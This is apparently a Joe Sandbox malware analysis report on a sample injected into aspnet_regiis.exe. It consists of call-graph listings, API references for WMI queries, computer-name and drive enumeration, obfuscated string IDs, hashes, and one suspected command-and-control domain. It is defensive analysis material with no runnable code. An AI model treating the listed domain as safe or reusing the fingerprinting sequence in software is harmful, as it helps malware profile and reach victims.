13307 77098df9 13306->13307 13308 77074364 13309 7707436d 13308->13309 13309->13309 13310 7709c7e0 LdrInitializeThunk 13309->13310 13313 770744a2 13310->13313 13312 77074330 13313->13312 13313->13313 13314 770778c0 13313->13314 13315 770778e9 13314->13315 13315->13315 13316 77073840 LdrInitializeThunk 13315->13316 13316->13315 13317 77099461 13318 77099460 13317->13318 13318->13317 13321 7709946e 13318->13321 13324 77098a80 LdrInitializeThunk 13318->13324 13320 7709954e 13321->13320 13323 77098a80 LdrInitializeThunk 13321->13323 13323->13320 13324->13321 13325 77080ae1 13326 77080d30 13325->13326 13330 77080aeb 13325->13330 13330->13326 13331 77098a80 LdrInitializeThunk 13330->13331 13332 7709d5f0 13330->13332 13340 7709cda0 13330->13340 13348 7709cc90 13330->13348 13331->13330 13333 7709d601 13332->13333 13334 7709d68e 13333->13334 13352 77098a80 LdrInitializeThunk 13333->13352 13336 770954e0 RtlAllocateHeap 13334->13336 13339 7709d7de 13334->13339 13337 7709d736 13336->13337 13337->13337 13337->13339 13353 77098a80 LdrInitializeThunk 13337->13353 13339->13330 13341 7709cdc0 13340->13341 13342 7709cdfe 13341->13342 13354 77098a80 LdrInitializeThunk 13341->13354 13344 770954e0 RtlAllocateHeap 13342->13344 13347 7709ceff 13342->13347 13345 7709cea0 13344->13345 13345->13347 13355 77098a80 LdrInitializeThunk 13345->13355 13347->13330 13347->13347 13350 7709ccb0 13348->13350 13349 7709cd6f 13349->13330 13350->13349 13356 77098a80 LdrInitializeThunk 13350->13356 13352->13334 13353->13339 13354->13342 13355->13347 13356->13349 13357 7708ce64 CoSetProxyBlanket 13116 770989a6 13117 77098a5c 13116->13117 13118 770989b4 13116->13118 13119 77098a62 13116->13119 13122 770954e0 13117->13122 13118->13119 13121 77098a44 RtlReAllocateHeap 13118->13121 13121->13119 13123 77095500 13122->13123 13123->13123 13124 7709553c RtlAllocateHeap 13123->13124 13125 7706d736 13126 7706d750 13125->13126 13129 77092da0 13126->13129 13128 7706d791 13131 77092e10 CoCreateInstance 13129->13131 13132 770933ff 13131->13132 13133 77092eb6 SysAllocString 13131->13133 13134 77093417 GetVolumeInformationW 13132->13134 13136 77092f41 13133->13136 13139 77093432 13134->13139 13137 77092f49 CoSetProxyBlanket 13136->13137 13138 770933ee SysFreeString 13136->13138 13140 77092f69 SysAllocString 13137->13140 13141 770933e4 13137->13141 13138->13132 13139->13128 13143 77093040 13140->13143 13141->13138 13143->13143 13144 7709307c SysAllocString 13143->13144 13147 7709309f 13144->13147 13145 770933ce SysFreeString SysFreeString 13145->13141 13146 770933bd 13146->13145 13147->13145 13147->13146 13148 770930ea VariantInit 13147->13148 13150 77093150 13148->13150 13149 770933ac VariantClear 13149->13146 13150->13149 13151 77070f34 13154 77070f57 13151->13154 13153 7706e864 13154->13153 13155 77068f20 13154->13155 13160 770688e0 ExitProcess 13155->13160 13157 77068f63 13159 77068fac 13157->13159 13161 770688e0 ExitProcess 13157->13161 13159->13153 13160->13157 13161->13157 13358 77062170 13359 77062422 13358->13359 13360 77062184 13358->13360 13360->13359 13361 77095592 RtlFreeHeap 13360->13361 13361->13359 13362 770688f0 13364 770688fc 13362->13364 13363 77068cb8 ExitProcess 13364->13363 13365 77068cb3 13364->13365 13366 77068911 GetCurrentThreadId 13364->13366 13376 77098960 13365->13376 13368 77068944 GetForegroundWindow 13366->13368 13369 7706893e 13366->13369 13370 77068b28 GetCurrentProcessId 13368->13370 13371 77068b21 13368->13371 13369->13368 13370->13371 13371->13365 13373 7706bd50 FreeLibrary 13371->13373 13374 7706bd6c 13373->13374 13375 7706bd71 FreeLibrary 13374->13375 13375->13365 13379 7709a430 13376->13379 13378 77098965 FreeLibrary 13378->13363 13380 7709a439 13379->13380 13380->13378 13381 770955f0 13383 77095620 13381->13383 13382 7709568e 13382->13382 13385 770954e0 RtlAllocateHeap 13382->13385 13387 770957de 13382->13387 13383->13382 13389 77098a80 LdrInitializeThunk 13383->13389 13386 77095731 13385->13386 13386->13387 13390 77098a80 LdrInitializeThunk 13386->13390 13389->13382 13390->13387

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 77092da0-77092e01 1 77092e10-77092e37 0->1 1->1 2 77092e39-77092e55 1->2 4 77092e62-77092eb0 CoCreateInstance 2->4 5 77092e57 2->5 6 770933ff-7709342c call 7709bcb0 GetVolumeInformationW 4->6 7 77092eb6-77092eeb 4->7 5->4 12 77093432-7709343c 6->12 13 770934e4-770934eb 6->13 9 77092ef0-77092f16 7->9 9->9 11 77092f18-77092f43 SysAllocString 9->11 18 77092f49-77092f63 CoSetProxyBlanket 11->18 19 770933ee-770933fb SysFreeString 11->19 14 7709344f-77093456 12->14 16 77093458-7709345f 14->16 17 77093462-770934af call 77079410 14->17 16->17 25 770934b0-770934bb 17->25 21 77092f69-77092f8f 18->21 22 770933e4-770933ea 18->22 19->6 24 77092f90-77092fb1 21->24 22->19 24->24 26 77092fb3-77093039 SysAllocString 24->26 25->25 27 770934bd-770934c9 25->27 28 77093040-7709307a 26->28 29 770934cf-770934df call 77068240 27->29 30 77093440-77093449 27->30 28->28 31 7709307c-770930a8 SysAllocString 28->31 29->30 30->13 30->14 35 770933ce-770933e0 SysFreeString * 2 31->35 36 770930ae-770930d0 31->36 35->22 38 770933c4-770933ca 36->38 39 770930d6-770930d9 36->39 38->35 39->38 40 770930df-770930e4 39->40 40->38 41 770930ea-77093142 VariantInit 40->41 42 77093150-7709317f 41->42 42->42 43 77093181-77093196 42->43 44 7709319a-7709319c 43->44 45 770933ac-770933bd VariantClear 44->45 46 770931a2-770931a8 44->46 45->38 46->45 47 770931ae-770931bb 46->47 49 770931fd 47->49 50 770931bd-770931c4 47->50 51 770931ff-7709321b call 770681b0 49->51 52 770931dc-770931e0 50->52 61 7709335e-7709336f 51->61 62 77093221-77093228 51->62 53 770931d0 52->53 54 770931e2-770931eb 52->54 59 770931d1-770931da 53->59 56 770931ed-770931f0 54->56 57 770931f2-770931f6 54->57 56->59 57->59 60 770931f8-770931fb 57->60 59->51 59->52 60->59 64 77093371 61->64 65 77093376-77093386 61->65 62->61 63 7709322e-77093236 62->63 66 77093240-7709324a 63->66 64->65 67 77093388 65->67 68 7709338d-770933a9 call 770681e0 call 770681c0 65->68 70 7709324c-77093251 66->70 71 77093260-77093266 66->71 67->68 68->45 73 77093282-77093284 70->73 74 77093268-7709326b 71->74 75 770932a3-770932af 71->75 76 77093288-7709328c 73->76 74->75 80 7709326d-7709327f 74->80 78 7709330c-77093314 75->78 79 770932b1-770932b4 75->79 81 7709328e-77093294 76->81 84 77093321-77093324 78->84 85 77093316-7709331c 78->85 79->78 83 770932b6-77093307 79->83 80->73 81->61 86 7709329a-7709329c 81->86 83->76 87 77093357-77093359 84->87 88 77093326-77093352 84->88 85->81 86->66 89 7709329e 86->89 87->73 88->73 89->61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(7709F680,00000000,00000001,7709F670,00000000), ref: 77092EA8
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(n?o1), ref: 77092F1D
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 77092F5B
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(n?o1), ref: 77092FB4
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(n?o1), ref: 7709307D
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 770930EF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                              • String ID: .$@C$C$X7sI$\$a3f5$n?o1
                                                                                                                                                                                                              • API String ID: 65563702-3752972459
                                                                                                                                                                                                              • Opcode ID: 6d57e03277ea9320657a83af73df667fde6223bd6925eb51fb5d0a97762ec434
                                                                                                                                                                                                              • Instruction ID: 1ea672db1c03c54ee33ebe431b3d62c825307f5bc7c28abf5da43a81ba316ba6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d57e03277ea9320657a83af73df667fde6223bd6925eb51fb5d0a97762ec434
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F12DA726483419FE3108F28C845B9AFBE6EBC1B04F148A2CF9959B381D779D805DF96

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 90 7707e778-7707e77d 91 7707e784-7707e78e 90->91 92 7707e92c 90->92 93 7707e7ab 90->93 94 7707e796 90->94 95 7707e932-7707e93b call 770681c0 90->95 96 7707e7d2-7707e7de 90->96 97 7707e7b1-7707e7b9 call 770681c0 90->97 98 7707e7d0 90->98 99 7707eaf0-7707eb7f 90->99 100 7707e7df-7707e7ff 90->100 101 7707e95f-7707e9ef 90->101 102 7707e79c-7707e7a2 call 770681c0 90->102 103 7707e7bc-7707e7c1 90->103 91->94 92->95 93->97 94->102 95->101 97->103 98->96 106 7707eb80-7707eb92 99->106 107 7707e800-7707e84b 100->107 109 7707e9f0-7707ea02 101->109 102->93 103->98 106->106 114 7707eb94-7707ebca 106->114 107->107 110 7707e84d-7707e8d2 107->110 109->109 115 7707ea04-7707ea3a 109->115 116 7707e8e0-7707e8ff 110->116 122 7707ebe0 114->122 123 7707ebcc-7707ebd1 114->123 120 7707ea43 115->120 121 7707ea3c-7707ea41 115->121 116->116 119 7707e901-7707e924 call 7707c3b0 116->119 119->92 125 7707ea46-7707ea98 call 770681b0 120->125 121->125 126 7707ebe3-7707ec33 call 770681b0 122->126 123->126 134 7707eaa0-7707eace 125->134 135 7707ec40-7707ec6e 126->135 134->134 137 7707ead0-7707eae1 call 7707a4f0 134->137 135->135 136 7707ec70-7707ec79 call 7707a4f0 135->136 140 7707ec7e-7707eca9 call 770681c0 136->140 137->99
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D!J'$D!J'$E=N3$E=N3$K9D?$K9D?$TU$U-T#$U-T#$U1A7$U1A7$^)H/$^)H/$t%L;$t%L;$MNO$MNO
                                                                                                                                                                                                              • API String ID: 0-2555291317
                                                                                                                                                                                                              • Opcode ID: fd9c15df2b6afdc96211608b8d85a952ac8f7d313dad40ed1d0149456b6be3c1
                                                                                                                                                                                                              • Instruction ID: 4e18ac01f9cdaac8f40e946c24db08fd62a9ecc775249b68ad87f91339cb7752
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd9c15df2b6afdc96211608b8d85a952ac8f7d313dad40ed1d0149456b6be3c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3C12EB05053509FDB14CF19C882B5ABFB0EB46754F1285ACE8569F3A2DB79C802CF96

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 187 7706dea6-7706dee4 call 7708df50 call 77069990 CoUninitialize 192 7706def0-7706df43 187->192 192->192 193 7706df45-7706df62 192->193 194 7706df70-7706dfb6 193->194 194->194 195 7706dfb8-7706e001 194->195 196 7706e010-7706e063 195->196 196->196 197 7706e065-7706e06f 196->197 198 7706e071-7706e074 197->198 199 7706e08b-7706e098 197->199 200 7706e080-7706e089 198->200 201 7706e0ad-7706e0b0 199->201 202 7706e09a-7706e09e 199->202 200->199 200->200 204 7706e0b2-7706e0bc 201->204 203 7706e0a0-7706e0a9 202->203 203->203 205 7706e0ab 203->205 206 7706e0be-7706e0c2 204->206 207 7706e0dd 204->207 205->204 209 7706e0d0-7706e0d9 206->209 208 7706e0e0-7706e0eb 207->208 210 7706e0ed-7706e0ef 208->210 211 7706e0fb-7706e103 208->211 209->209 212 7706e0db 209->212 213 7706e0f0-7706e0f9 210->213 214 7706e105-7706e106 211->214 215 7706e11b-7706e127 211->215 212->208 213->211 213->213 216 7706e110-7706e119 214->216 217 7706e141-7706e1f6 215->217 218 7706e129-7706e12b 215->218 216->215 216->216 220 7706e200-7706e23c 217->220 219 7706e130-7706e13d 218->219 219->219 221 7706e13f 219->221 220->220 222 7706e23e-7706e25f 220->222 221->217 223 7706e260-7706e291 222->223 223->223 224 7706e293-7706e2b2 call 7706bd80 223->224 226 7706e2b7-7706e2d1 224->226
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: $.r$6 4z$Q\Jd$WXOL$[wy$_&%g$marshal-zhukov.com$tefo$}LfB
                                                                                                                                                                                                              • API String ID: 3861434553-4133877442
                                                                                                                                                                                                              • Opcode ID: f379de26e7ad978bfe98ccb3375c5b5927a73b7a1544bc0efebf64596969fea6
                                                                                                                                                                                                              • Instruction ID: fb582b36e9e4e7a5e24dcde7cd9611cd0d2ec5d772cf44dfceaa7f6d54af3e39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f379de26e7ad978bfe98ccb3375c5b5927a73b7a1544bc0efebf64596969fea6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BB125B51057818FD31A8F6AC4A5762BFF2BF56300B2985ACC4D68F3A6C7768406CF50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 361 7706b620-7706b6a8 362 7706b6b0-7706b6b9 361->362 362->362 363 7706b6bb-7706b6ce 362->363 365 7706ba87 363->365 366 7706b962 363->366 367 7706b9e0-7706ba64 call 77068180 363->367 368 7706ba81 363->368 369 7706baaf 363->369 370 7706ba6a-7706ba71 363->370 371 7706b96b-7706b9d1 call 77068180 363->371 372 7706ba96-7706baa8 363->372 373 7706b6d5-7706b6d7 363->373 374 7706b952-7706b959 363->374 375 7706ba90 363->375 376 7706b6dc-7706b903 363->376 377 7706ba78-7706ba7c 363->377 365->375 366->371 367->370 395 7706bab7-7706baca 369->395 370->365 370->368 370->369 370->372 370->375 370->377 380 7706bbc7-7706bbce 370->380 381 7706bd07-7706bd0c 370->381 382 7706bc04-7706bc1f 370->382 383 7706bcc1-7706bcc7 call 77098980 370->383 384 7706bb15-7706bb2f 370->384 385 7706bbd5-7706bbd9 370->385 386 7706bd13-7706bd16 370->386 387 7706bc90-7706bc95 370->387 388 7706bd1f-7706bd2e 370->388 389 7706bcdd-7706bd00 370->389 390 7706bbdb-7706bbe8 370->390 391 7706bc5b-7706bc5d 370->391 392 7706bc26-7706bc2f 370->392 393 7706bca5-7706bcba 370->393 394 7706bd36-7706bd3d 370->394 370->395 396 7706bd33 370->396 397 7706bb70-7706bb87 370->397 398 7706bc70-7706bc76 370->398 399 7706bc7e-7706bc80 370->399 371->367 372->369 372->380 372->381 372->382 372->383 372->384 372->385 372->386 372->387 372->388 372->389 372->390 372->391 372->392 372->393 372->394 372->395 372->396 372->397 372->398 372->399 401 7706bc83-7706bc8a 373->401 374->366 402 7706b910-7706b934 376->402 400 7706bc45-7706bc48 377->400 380->381 380->382 380->383 380->385 380->386 380->387 380->388 380->389 380->390 380->391 380->392 380->393 380->394 380->396 380->398 380->399 381->386 381->391 381->396 381->398 381->399 382->381 382->383 382->386 382->387 382->388 382->389 382->391 382->392 382->393 382->394 382->396 382->398 382->399 413 7706bccc-7706bcd6 383->413 410 7706bb30-7706bb4e 384->410 404 7706bc3c 385->404 386->388 411 7706bc9d 387->411 388->387 389->381 389->386 389->391 389->396 389->398 389->399 415 7706bbf0-7706bbfd 390->415 391->398 392->404 393->381 393->383 393->386 393->389 393->391 393->396 393->398 393->399 394->404 409 7706bad0-7706bb0a 395->409 396->394 403 7706bb90-7706bbae 397->403 398->399 399->401 419 7706bc4f-7706bc52 400->419 402->402 405 7706b936-7706b941 402->405 403->403 412 7706bbb0-7706bbc1 403->412 404->400 422 7706b944-7706b94b 405->422 409->409 420 7706bb0c 409->420 410->410 421 7706bb50-7706bb61 410->421 411->393 412->380 413->381 413->386 413->389 413->391 413->396 413->398 413->399 415->381 415->382 415->383 415->386 415->387 415->388 415->389 415->391 415->392 415->393 415->394 415->396 415->398 415->399 419->391 420->384 421->397 422->365 422->366 422->367 422->368 422->369 422->370 422->371 422->372 422->374 422->375 422->377 422->380 422->384 422->385 422->390 422->395 422->397
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 'q,s$'u w$a1b3$c)J+$j5f7$p%m'$!#$y%{
                                                                                                                                                                                                              • API String ID: 0-712734333
                                                                                                                                                                                                              • Opcode ID: dfb1fca6ccc563d2c8dab1dee3a5a75b5987e87e9e38bc252193a160e35fd411
                                                                                                                                                                                                              • Instruction ID: e0a33857f105b9803bc493148b1373934ddbadd4633ea9268309c76562e28760
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfb1fca6ccc563d2c8dab1dee3a5a75b5987e87e9e38bc252193a160e35fd411
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7028CB2601B41CFD3248F26C896B97BBF5FB45314F268A2CD5A68B790DB78A405CF40

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 623 7707e110-7707e168 624 7707e170-7707e19b 623->624 624->624 625 7707e19d-7707e1e2 624->625 627 7707e1e4-7707e1e9 625->627 628 7707e1eb 625->628 629 7707e1ee-7707e212 call 770681b0 627->629 628->629 633 7707e214 629->633 634 7707e21b-7707e25b call 770681b0 629->634 633->634 637 7707e260-7707e2b5 634->637 637->637 638 7707e2b7-7707e2c2 637->638 639 7707e2c4-7707e2cf 638->639 640 7707e2e1-7707e2ee 638->640 641 7707e2d0-7707e2df 639->641 642 7707e311-7707e32d call 7709c7e0 640->642 643 7707e2f0-7707e2f4 640->643 641->640 641->641 647 7707e344 642->647 648 7707e334-7707e33b 642->648 649 7707e363-7707e417 642->649 650 7707e5ef-7707e5f8 642->650 651 7707e34a-7707e353 642->651 645 7707e300-7707e30f 643->645 645->642 645->645 647->651 648->647 656 7707e420-7707e434 649->656 652 7707e610 650->652 653 7707e5fa-7707e5ff 650->653 654 7707e456 651->654 655 7707e359-7707e35e 651->655 658 7707e617-7707e6cb call 770681b0 652->658 653->658 657 7707e45d-7707e505 call 770681b0 654->657 655->657 656->656 659 7707e436-7707e446 call 7707c530 656->659 666 7707e510-7707e555 657->666 667 7707e6d0-7707e713 658->667 665 7707e44b-7707e44e 659->665 665->654 666->666 668 7707e557-7707e562 666->668 667->667 669 7707e715-7707e724 667->669 670 7707e564-7707e56f 668->670 671 7707e581-7707e58e 668->671 672 7707e726-7707e728 669->672 673 7707e741-7707e74e 669->673 674 7707e570-7707e57f 670->674 675 7707e5b1-7707e5ca GetLogicalDrives call 7709c7e0 671->675 676 7707e590-7707e594 671->676 677 7707e730-7707e73f 672->677 678 7707e754 673->678 679 7707e5d0-7707e5e6 GetLogicalDrives call 7709c7e0 673->679 674->671 674->674 675->650 680 7707e5a0-7707e5af 676->680 677->673 677->677 682 7707e760-7707e76f 678->682 679->650 680->675 680->680 682->682 685 7707e771 682->685 685->679
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: x{$srq
                                                                                                                                                                                                              • API String ID: 0-2442905896
                                                                                                                                                                                                              • Opcode ID: 208a855910957410e3e91a00d1f14b66e41070eb32dd6d2c367e17eb8d7403a1
                                                                                                                                                                                                              • Instruction ID: 5959acc913209b6f103f205f9a75e9f0781e8df8cf06217b4e35ac78025cf07f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 208a855910957410e3e91a00d1f14b66e41070eb32dd6d2c367e17eb8d7403a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F198B16093458FD700CF15C89166BBBF2EF86B14F148A2CF5969B391E3788906CB96

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 687 7708725d-770872bf call 7709bcb0 691 770872c0-770872ea 687->691 691->691 692 770872ec-770872f5 691->692 693 7708730d 692->693 694 770872f7-770872fd 692->694 696 77087310-7708731c 693->696 695 77087300-77087309 694->695 695->695 697 7708730b 695->697 698 7708733b-770873ae FreeLibrary call 7709bcb0 GetComputerNameExA 696->698 699 7708731e-77087324 696->699 697->696 704 770873b0-7708740d 698->704 700 77087330-77087339 699->700 700->698 700->700 704->704 705 7708740f-77087418 704->705 706 7708741a-77087425 705->706 707 7708743d-77087440 705->707 709 77087430-77087439 706->709 708 77087442-7708744e 707->708 711 7708746b-770874c4 GetComputerNameExA 708->711 712 77087450-77087456 708->712 709->709 710 7708743b 709->710 710->708 714 770874d0-770874f7 711->714 713 77087460-77087469 712->713 713->711 713->713 714->714 715 770874f9-77087502 714->715 716 7708751b-77087527 715->716 717 77087504-7708750a 715->717 718 77087529-7708752f 716->718 719 7708753b-770875a1 716->719 720 77087510-77087519 717->720 721 77087530-77087539 718->721 723 770875b0-770875f4 719->723 720->716 720->720 721->719 721->721 723->723 724 770875f6-770875ff 723->724 725 7708761d 724->725 726 77087601-7708760a 724->726 727 77087620-7708762c 725->727 728 77087610-77087619 726->728 730 7708764b-770876b6 call 7709bcb0 727->730 731 7708762e-77087634 727->731 728->728 729 7708761b 728->729 729->727 736 770876c0-770876e8 730->736 732 77087640-77087649 731->732 732->730 732->732 736->736 737 770876ea-770876f3 736->737 738 7708770b-7708771d 737->738 739 770876f5-770876fb 737->739 741 7708786f-770878b9 738->741 742 77087723-7708772f 738->742 740 77087700-77087709 739->740 740->738 740->740 744 770878c0-770878d8 741->744 743 77087730-7708773d 742->743 746 7708773f-77087744 743->746 747 77087750-77087756 743->747 744->744 745 770878da-770878e5 744->745 748 770878fb-77087901 call 7708bc30 745->748 749 770878e7-770878ef 745->749 752 77087810-77087814 746->752 750 77087758-7708775b 747->750 751 77087780-77087791 747->751 759 77087906-77087922 748->759 753 770878f0-770878f9 749->753 750->751 755 7708775d-77087773 750->755 756 77087828-77087831 751->756 757 77087797-7708779a 751->757 758 77087816-7708781c 752->758 753->748 753->753 755->752 762 77087838-7708783b 756->762 763 77087833-77087836 756->763 757->756 760 770877a0-7708780f 757->760 758->741 761 7708781e-77087820 758->761 760->752 761->743 766 77087826 761->766 764 77087868-7708786d 762->764 765 7708783d-77087866 762->765 763->758 764->741 764->752 765->752 766->741
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 77087347
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 7708737E
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 77087485
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                              • String ID: 97
                                                                                                                                                                                                              • API String ID: 2243422189-3819085924
                                                                                                                                                                                                              • Opcode ID: 349ae8493f0855ffe3e38461083fe2519c26463e5917b930d0cc6ae4e4258a55
                                                                                                                                                                                                              • Instruction ID: bb9161f34891fa0a0e7745599882a2a9ada3339f7cc036e5b2ff0e719a66aee2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 349ae8493f0855ffe3e38461083fe2519c26463e5917b930d0cc6ae4e4258a55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1D270109B818EE326CF35C4547A3BFE39F53604F08989DC0EB8B696D779614ACB62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
